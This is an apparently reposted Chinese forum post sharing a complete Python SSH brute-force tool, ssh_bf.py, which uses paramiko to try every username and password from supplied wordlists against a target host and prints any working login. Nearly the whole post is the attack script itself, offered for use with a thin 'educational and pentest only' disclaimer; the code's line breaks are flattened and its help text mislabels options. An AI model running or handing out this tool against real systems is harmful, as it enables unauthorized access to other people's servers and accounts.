================================================================作者:xfkxfk团队:F4ck Team
此贴最早发在http://www.oschina.net/code/snippet_244244_10663
然后,今天翻出来了,就在论坛分享一下吧,很简单,大牛勿喷啊!
正好今天论坛升级开放,庆祝一下,话说,这几天寂寞死了~~~~~================================================================上张效果图吧:
?#!/usr/bin/env python#-*-coding = UTF-8-*-#author@:xfkxfk#blog@:team.f4ck.net??import sysimport osimport time#from threading import Thread?try: from paramiko import SSHClient from paramiko import AutoAddPolicyexcept ImportError: print G+''' You need paramiko module. http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END sys.exit(1)?docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfkxfk [*] Version : v.0.2 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """??if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear'else: clearing = 'cls'os.system(clearing)??R = "\033[31m";G = "\033[32m";Y = "\033[33m"END = "\033[0m"??def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | team.f4ck.net |" print " | 16/05/2012 ssh_bf.py v.0.2 |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs+END??def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is 22)" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit(1)?def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status??def makelist(file): ''' Make usernames and passwords lists ''' items = []? try: fd = open(file, 'r') except IOError: print R+'unable to read file \'%s'' % file+END pass? except Exception, e: print R+'unknown error'+END pass? for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return items?def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= 1: help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"\n[!] BruteForcing target ...\n"+END# print "here is ok"# print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist)? print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(str(hostname), int(port), str(username), str(password)) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END# pass else: print G+"\n[+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s\n" % password+END# sys.exit(0) except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise print Y+"[+] Done.^-^\n"+END sys.exit(0)??if __name__ == "__main__": main()
注意:修改一下源码里的一个小问题:
current = BruteForce(str(hostname), int(port), str(username), str(password))
注意参数的类型
? 转载保留版权:Panni_007 Security? 本文链接地址:python-SSH暴力破解工具? 如果喜欢可以:点此订阅本站 53d4e0d893227499f659c9d8412ed85a 回避现实的人,未来将更不理想。